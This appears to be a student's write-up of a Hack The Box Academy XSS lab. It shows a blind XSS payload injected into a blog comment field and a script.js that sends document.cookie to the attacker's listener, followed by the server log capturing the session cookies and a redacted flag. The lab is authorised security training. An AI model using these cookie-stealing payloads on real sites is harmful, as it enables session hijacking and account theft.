Skills Assessment

We are performing a Web Application Penetration Testing task for a company that hired you, which just released their new Security Blog. In our Web Application Penetration Testing plan, we reached the part where you must test the web application against Cross-Site Scripting vulnerabilities (XSS).

Start the server below, make sure you are connected to the VPN, and access the /assessment directory on the server using the browser:

Apply the skills you learned in this module to achieve the following:

Identify a user-input field that is vulnerable to an XSS vulnerability
Find a working XSS payload that executes JavaScript code on the target's browser
Using the Session Hijacking techniques, try to steal the victim's cookies, which should contain the flag

Our target IP :

What is the value of the 'flag' cookie?

Access to our target. We can access to /assessment/index.php/2021/06/11/welcome-to-security-blog/ and leave a comment :

So, we put a php listener on the port 4444 :

sudo php -S 0.0.0.0:4444

Now, try a payload from PayloadAllTheThings :

"><script src=//10.10.15.45:4444/caca>.xss.ht></script>

┌─[eu-academy-3]─[10.10.15.45]─[htb-ac-1811357@htb-cfog85vpsr]─[~]
└──╼ [★]$ sudo php -S 0.0.0.0:4444
[Tue Jan 20 18:48:37 2026] PHP 8.2.29 Development Server (http://0.0.0.0:4444) started
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36126 Accepted
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36126 [404]: GET /caca - No such file or directory
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36126 Closing
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36128 Accepted

It's Working, so create a file named script.js :

┌─[eu-academy-3]─[10.10.15.45]─[htb-ac-1811357@htb-cfog85vpsr]─[~]
└──╼ [★]$ nano script.js

┌─[eu-academy-3]─[10.10.15.45]─[htb-ac-1811357@htb-cfog85vpsr]─[~]
└──╼ [★]$ cat script.js 
document.location='http://10.10.15.45:4444/index.php?c='+document.cookie

Use the Blind XSS Found to get a session hijacking :

"><script src=//10.10.15.45:4444/script.js>.xss.ht></script>

We get the flag :

┌─[eu-academy-3]─[10.10.15.45]─[htb-ac-1811357@htb-cfog85vpsr]─[~]
└──╼ [★]$ sudo php -S 0.0.0.0:4444
[Tue Jan 20 18:48:37 2026] PHP 8.2.29 Development Server (http://0.0.0.0:4444) started
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36126 Accepted
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36126 [404]: GET /caca - No such file or directory
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36126 Closing
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36128 Accepted
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36128 [404]: GET /caca - No such file or directory
[Tue Jan 20 18:48:48 2026] 10.129.205.161:36128 Closing
[Tue Jan 20 18:49:42 2026] 10.129.205.161:36174 Accepted
[Tue Jan 20 18:49:42 2026] 10.129.205.161:36174 [200]: GET /script.js
[Tue Jan 20 18:49:42 2026] 10.129.205.161:36174 Closing
[Tue Jan 20 18:49:43 2026] 10.129.205.161:36178 Accepted
[Tue Jan 20 18:49:43 2026] 10.129.205.161:36178 [404]: GET /index.php?c=wordpress_test_cookie=WP%20Cookie%20check;%20wp-settings-time-2=1768956551;%20flag=HTB{xxxxx_xxxx_xxxxxxxxx_xxxxx} - No such file or directory
[Tue Jan 20 18:49:43 2026] 10.129.205.161:36178 Closing

PreviousXSS Prevention NextIntroduction to Linux Privilege Escalation

Last updated 17 days ago